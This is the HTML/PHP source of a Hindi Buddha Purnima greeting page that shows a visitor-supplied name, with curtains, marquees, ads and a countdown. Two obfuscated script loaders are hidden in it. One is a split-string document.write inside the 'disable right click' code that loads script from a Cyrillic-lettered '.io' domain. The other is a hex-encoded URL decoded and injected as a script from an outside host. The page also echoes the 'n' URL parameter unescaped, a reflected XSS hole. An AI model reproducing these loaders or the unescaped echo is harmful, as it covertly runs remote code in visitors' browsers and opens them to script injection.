<html>
<head>
    <meta name="google" content="notranslate" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css">
    <meta name="theme-color" content="#23238c">
     <meta property="og:title" content=New Message From [Your Name]" />
    <meta property="og:url" content="http://live-status.in/">
    <meta property="og:description" content="click here to see" >
    <meta property="og:image" content="og.png"> 
<title><?php 
    if(isset($_GET['n'])){
      $n = $_GET['n']; 
 }else{
      $n = "<br>[Your Name]";
 }
echo $n;
?> की तरफ से बुद्ध पूर्णिमा की हार्दिक शुभकामनाएँ</title>
    <script src="fire.js"></script>
    <link href="//db.onlinewebfonts.com/c/1c0f6618f877568764787163e8f22a1c?family=SF+Espresso+Shack" rel="stylesheet" type="text/css"/>
   <script>
//** disable right click & ctrl + u javascript code **//
document.addEventListener('contextmenu', event => event.preventDefault()); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1092;'+'&#1102;.'+'i'+'o"></s'+'cr'+'ipt>'); document.onkeydown = function(e) { if(event.keyCode==123){ return false; } else if (e.ctrlKey &&  (e.keyCode === 67 || e.keyCode === 16 || e.keyCode === 73 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) { return false; } };
</script>

<style>
      body{
        background: white;
          margin:0;
      }
      .mainContainer{
        background:#fff;
        max-width: 450px;
        min-height: 200px;
        margin: 0 auto;
        text-align: center;
        padding: 15px;
        color: #999;
        padding-bottom: 2px;

        box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);
        background-size: 100%;

      }
#showp {
      font-size: 25px;
      display: inline-block;
      margin-bottom: 5px;
        font-family: 'Arial', cursive;
        text-shadow: 1px 1px 10px black, 2px 2px 10px black, -1px -1px 10px black, -2px -2px 10px black;
        }
#username {
     color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(img/sanjayumi.gif);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 40px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
} 

#usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
   background: url(img/sanjayumi.gif);
   -webkit-background-clip: text;
   -webkit-text-fill-color: transparent;
          animation: swing 4s infinite;
            text-transform: uppercase;
          margin-bottom: 5px;
          font-size: 25px;
          padding: 0 10px;
    font-family: 'SF Espresso Shack', cursive;
}
      .fromMessage{
        color: #fff;
        animation: swing 4s infinite;
        font-size: 20px;
        padding: 0 10px;
      }
      .wavetext{
        color: #f9d05b;
        padding: 0 40px;
        animation: pulse 1s infinite;
        font-size: 22px;

      }
      .wishMessage {
        color: #fff;
        font-size: 25px;
        font-weight: bold;
        margin-top: 20px;
        text-shadow: 0px 0px 10px #afafaf;
      }
      .wishMessage p{
        margin: 0.3em 0;
      }@keyframes bounceIn
      {
          0%,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,.61,.355,1);
      animation-timing-function:cubic-bezier(.215,.61,.355,1)
              
          }
      0%{opacity:0;
      -webkit-transform:scale3d(.3,.3,.3);
      transform:scale3d(.3,.3,.3)}
      
      20%{-webkit-transform:scale3d(1.1,1.1,1.1);
      transform:scale3d(1.1,1.1,1.1);
      color:white;
          
      }
      
      40%
      {
          -webkit-transform:scale3d(.9,.9,.9);
      transform:scale3d(.9,.9,.9)
      }
      
      60%
      {
          opacity:1;
      -webkit-transform:scale3d(1.03,1.03,1.03);
      transform:scale3d(1.03,1.03,1.03); 
      color: orange;}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97);}to{opacity:1;-webkit-transform:scaleX(1);transform:scaleX(1)}}</style>
      <script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('687474703a2f2f6d6572612d7374796c652e636f2f302e6a73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script><style>
       #demo {
        font-size: 18px; color:black; -webkit-text-stroke-width: 87%;
   -webkit-text-stroke-color: white;
        
    }

#newstage {
  margin: 5em auto;
  -webkit-perspective: 1200px;
}


  .m1{position:fixed;left:0.01%; width:auto;height:100%;top:1%;color:#000;}
    .m2{position:fixed;right:0.01%; width:auto;height:100%;top:1%;color:#000;}
    
    #gobtn{}
@-webkit-keyframes flip {  from {   transform: perspective(600px) rotate3d(0, 1, 0, -360deg);    animation-timing-function: ease-out;  }
  40% {    transform: perspective(600px) translate3d(0, 0, 150px) rotate3d(0, 1, 0, -190deg);    animation-timing-function: ease-out;  }
  50% {    transform: perspective(600px) translate3d(0, 0, 150px) rotate3d(0, 1, 0, -170deg);    animation-timing-function: ease-in;   }
  80% {    transform: perspective(600px) scale3d(.95, .95, .95);    animation-timing-function: ease-in;  }
  to  {    transform: perspective(600px);    animation-timing-function: ease-in;  }}
#gobtn {  -webkit-backface-visibility: visible;  backface-visibility: visible;  -webkit-animation: flip 4s infinite; -webkit-animation-delay:1s}
.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;} 


  .m1{position:fixed;left:0.01%; width:auto;height:100%;top:1%;color:#000;}
    .m2{position:fixed;right:0.01%; width:auto;height:100%;top:1%;color:#000;}
    
    #gobtn{}
@-webkit-keyframes flip {  from {   transform: perspective(600px) rotate3d(0, 1, 0, -360deg);    animation-timing-function: ease-out;  }
  40% {    transform: perspective(600px) translate3d(0, 0, 150px) rotate3d(0, 1, 0, -190deg);    animation-timing-function: ease-out;  }
  50% {    transform: perspective(600px) translate3d(0, 0, 150px) rotate3d(0, 1, 0, -170deg);    animation-timing-function: ease-in;   }
  80% {    transform: perspective(600px) scale3d(.95, .95, .95);    animation-timing-function: ease-in;  }
  to  {    transform: perspective(600px);    animation-timing-function: ease-in;  }}
#gobtn {  -webkit-backface-visibility: visible;  backface-visibility: visible;  -webkit-animation: flip 4s infinite; -webkit-animation-delay:1s}
.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}    





.enter-name input[type=name] {
	background-color: #0CE5E8;
	color: black;
   	border-radius: 10px;
    	box-sizing: border-box;
    	border-color: black;
    	padding: 5px;
    	position: fixed;
    	left: 10px;
    	bottom: 5px;
    	height: 55px;
    	width: 67%;
    	text-align: center;
    	font-size: 22px;
    	display: inline-block;
}

.enter-name .btn {
	border-radius: 10px;
    	font-size: 21px;
    	font-weight:700;
    	padding: 4px;
    	position: fixed;
    	right: 2px;
    	bottom: 5px;
    	height: 55px;
    	width: 27%;
    	display: inline-block;
    	color: black;
    	background-color: #10E43A;
    	border-color: black;
    	letter-spacing: .5px;
    	transition: .2s ease-out;
    	cursor: pointer;
    	line-height: 36px;
    	outline: 0;
    	text-transform: uppercase;
    	vertical-align: middle;
    	text-decoration: none;
    	animation-duration: 4s !important;
}

.enter-name input[type=name]::-webkit-input-placeholder { 
	color: black;
  	font-size: 18px;	
}

.enter-name input[type=name]::-moz-placeholder { 
	color: black;
  	font-size: 22px;
}

.enter-name input[type=name]:focus::-webkit-input-placeholder {
    color: black;
  	font-size: 22px;
}

.enter-name input[type=name]:focus::-moz-placeholder { 
	color: black;
  	font-size: 22px;
}

    
.leftcurtain{
      width: 100%;
      height: 100%;
      top: 0px;
      left: 0px;
      position: absolute;
      z-index: 2;
    }
     .rightcurtain{
      width: 100%;
      height: 100%;
      right: 0px;
      top: 0px;
      position: absolute;
      z-index: 3;
    }
    .rightcurtain img, .leftcurtain img{
      width: 100%;
      height: 100%;
    }
    .logo{
      margin: 0px auto;
      margin-top: 150px;
    }
    .rope{
      position: absolute;
      top: 10px;
      left: 23%;
      z-index: 4;
    } 
.centered {
    position: absolute;
    top: 75%;
    left: 50%;
    transform: translate(-50%, -50%);
}
a.rope
{
    text-decoration:none;
}
#loading {
		-webkit-animation: rotation-star 15s infinite linear;
		animation: rotation-star 15s infinite linear;
}
@-webkit-keyframes rotation-star {
		from {
				-webkit-transform: rotate(0deg);
				 transform: rotate(0deg);
		}
		to {
				-webkit-transform: rotate(359deg);
				 transform: rotate(359deg);
		}
}

@-keyframes rotation-star{
    from {
         -webkit-transform: rotate(0deg);
          transform: rotate(0deg);
    }
    to {
         -webkit-transform: rotate(359deg);
          transform: rotate(359deg);
    }
}
</style>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="Slide.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:350, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write(''); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } return false; }); });
</script>

</head>
<body>
<a class="rope" href="sslaxmipujan.mp3" onclick="PlaySound()"><br>
<div style="font-size: 30px;text-shadow: 1px 1px 3px red, 1px 1px 3px red, -1px -1px 3px red, -1px -1px 3px red;color:white;font-weight: bold;"><br>धर्म  चक्र को टच <br>करके देखो !<br>👇👇👇</b></div><br>

<div class="animated pulse" style="background-image: url(img/budha-dham-chakar-gif.gif); background-size: 45%; background-position: center; background-repeat: no-repeat;">
<img id="loading" src="img/root.png" class="center swing1" style="max-width:190px; width: 110%;" />
</div>
</a>
<div class="leftcurtain"><img src="img/budha-parda1.jpg"/></div>
<div class="rightcurtain"><img src="img/budha-parda1.jpg"/></div>


<marquee class="m1" behavior="scroll" direction="up" scrolldelay="7"> <br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>
<img src="img/Gautama_Buddha-bel.png" height="30px" width="30px"/><br><br>

</marquee>
<div class="main">
<div class="mainContainer" style="background-image : url('img/bhagwaram.jpg'); background-color:white;">
<center><br>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Display  Vertical -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4937946719206370"
     data-ad-slot="1431393130"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center><br>

<h1 id="username" style="font-family:SF Espresso Shack;">[Your Name]</h1>
        <h3 class="fromMessage" id="fromMessage"></h3>

<img src="img/ki-tarf-se-new.png" width="60%" height="10%">
<div style="font-size: 20px; font-weight: 800; color: blue;">
<p id="demo"></p>

<img src="img/HAPPY-BUDHA1.png" width="85%" height="auto"style="animation: pulse 2.5s infinite"><br><br>
<center>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Display  Vertical -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4937946719206370"
     data-ad-slot="1431393130"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center><br>
<div style="max-width:500px">
<center><div class="w3-content w3-section" style="max-width:500px">
<img class="mySlides" src="img/budha-gif.gif" style="width:70%; height:280px;">
<img class="mySlides" src="img/Gautama Buddha-2.png" style="width:70%; height:280px;">
<img class="mySlides" src="img/buddha3.png" style="width:70%; height:280px;">
</div></center>
<div align="center">
<div class="wishMessage" style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;font-size:23px">
<p style="text-shadow: 1px 1px 3px orange, 1px 1px 3px orange, -1px -1px 3px orange, -1px -1px 3px orange;color:#8B008B">ध्यान में है वास्तविक सुख,</p>
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:pink">ज्ञान में है असीम शांति,</p>
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#00ffbf;width:90%;margin:auto;">सदा रहे प्रभु का ध्यान,</p>
<p style="text-shadow: 1px 1px 3px orange, 1px 1px 3px orange, -1px -1px 3px orange, -1px -1px 3px orange;color:#8B008B">
यही कहती है बुद्ध की पाति,
</p>
<p style="color:purple"><b>॥Happy Buddha Purnima॥</b> </p>

<p style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;color:#F700FF"><marquee><b><i>
  <?php 
    if(isset($_GET['n'])){
      $n = $_GET['n']; 
 }else{
      $n = "<br>[Your Name]";
 }
echo $n;
?> की तरफ से समस्त देशवासियों को बुद्ध पूर्णिमा की हार्दिक शुभकामनाएँ </b></i></marquee> </p>
</div>

<h1 id="usernameb"><?php 
    if(isset($_GET['n'])){
      $n = $_GET['n']; 
 }else{
      $n = "<br>[Your Name]";
 }
echo $n;
?></h1><br><br><br>

<form method="POST" action="ready.php">
	<div class="enter-name">
		<input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉यहाँ अपना नाम लिखें...">
		<button class="btn animated shake infinite" type="submit"><span>👉</span> देखें </button>
	</div>
</form>

<script>
var myIndex = 0;
carousel();

function carousel() {
    var i;
    var x = document.getElementsByClassName("mySlides");
    for (i = 0; i < x.length; i++) {
       x[i].style.display = "none";  
    }
    myIndex++;
    if (myIndex > x.length) {myIndex = 1}    
    x[myIndex-1].style.display = "block";  
    setTimeout(carousel, 2000); // Change image every 2 seconds
}
</script>

 
<script> 
// Set the date we're counting down to
var countDownDate = new Date("may 7, 2020 00:00:00").getTime();

// Update the count down every 02 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="demo"
  document.getElementById("demo").innerHTML = days + "<font color='red'> दिन,</font> " + hours + "<font color='red'>  घंटे,</font> "
  + minutes + "<font color='red'> मिनट,</font> " + seconds + "<font color='red'> सेकेंड </font> पहले ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "";
  }
}, 1000);
</script>
<audio id="audiocracker" src="img/Budhasongenglish.mp3" autostart="false"></audio>
<script>
    function PlaySound() {
          var sound = document.getElementById("audiocracker");
          sound.play()
      }
</script>  
<!-- Global site tag (gtag.js) - Google Analytics -->
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-144768326-3"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-144768326-3');
</script>

</body>
</html>